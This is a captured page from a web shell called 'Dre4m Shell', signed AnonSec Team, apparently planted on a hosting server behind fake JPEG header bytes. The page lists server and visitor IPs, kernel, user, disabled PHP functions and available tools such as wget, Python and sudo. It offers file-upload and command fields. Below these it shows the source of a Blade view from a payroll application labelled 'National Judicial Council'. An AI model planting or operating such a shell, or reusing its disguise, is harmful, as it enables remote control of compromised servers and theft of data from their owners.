ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.118.217.45
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/consolidated/newpayroll/resources/views/salarySetup/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/consolidated/newpayroll/resources/views/salarySetup/new.blade.php
@extends('layouts.layout')
@section('pageTitle')
  
@endsection

<style type="text/css">
  .form-control
  {
    font-size: 13px;

  }
  .col-md-12
  {
    padding: 0px 5px;
  }
  .table tr td
  {
    font-size: 13px;
    padding:13px;
    font-family: Verdana, Geneva, sans-serif;
  }
  .table tr th
  {
    padding: 15px;
    font-size: 13px;
    text-transform: uppercase;
    font-family: Verdana, Geneva, sans-serif;
    color: #262626;
    background: #eee;
  }
  .input-lg
  {
    padding: 5px !important;
  }
  fieldset { 
    display: block;
    margin-left: 2px;
    margin-right: 2px;
    padding-top: 0.35em;
    padding-bottom: 0.625em;
    padding-left: 0.75em;
    padding-right: 0.75em;
    border: 2px solid #eee;
}
</style>

@section('content')

 

<div class="box box-default" style="border-top: none; background:#FFF;">
 
</div>

    <div style="margin: 10px 20px;">
      <div align="center">
        <h3><b>{{strtoupper('NATIONAL JUDICIAL COUNCIL')}}</b></h3>
        
      </div>
          
      <br />
      @if (count($errors) > 0)
                  <div class="alert alert-danger alert-dismissible" role="alert">
                    <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                      <span aria-hidden="true">&times;</span>
                    </button>
                    <strong>Error!</strong> 
                    @foreach ($errors->all() as $error)
                        <p>{{ $error }}</p>
                    @endforeach
                  </div>
                @endif 
    @if(session('err'))
      <div class="col-sm-12 alert alert-warning alert-dismissible hidden-print" role="alert">
      <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
      </button>
      <strong>Error!</strong> 
      {{ session('err') }} 
      </div>                        
   @endif
    @if(session('msg'))
          <div class="alert alert-success alert-dismissible" role="alert">
            <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
            <strong>Success!</strong> 
            {{ session('msg') }}
          </div>                        
          @endif

  </div>

<div class="box-body" style ="background: #FFF;">


</div><!-- end box-body-->

@endsection








Anon7 - 2022
AnonSec Team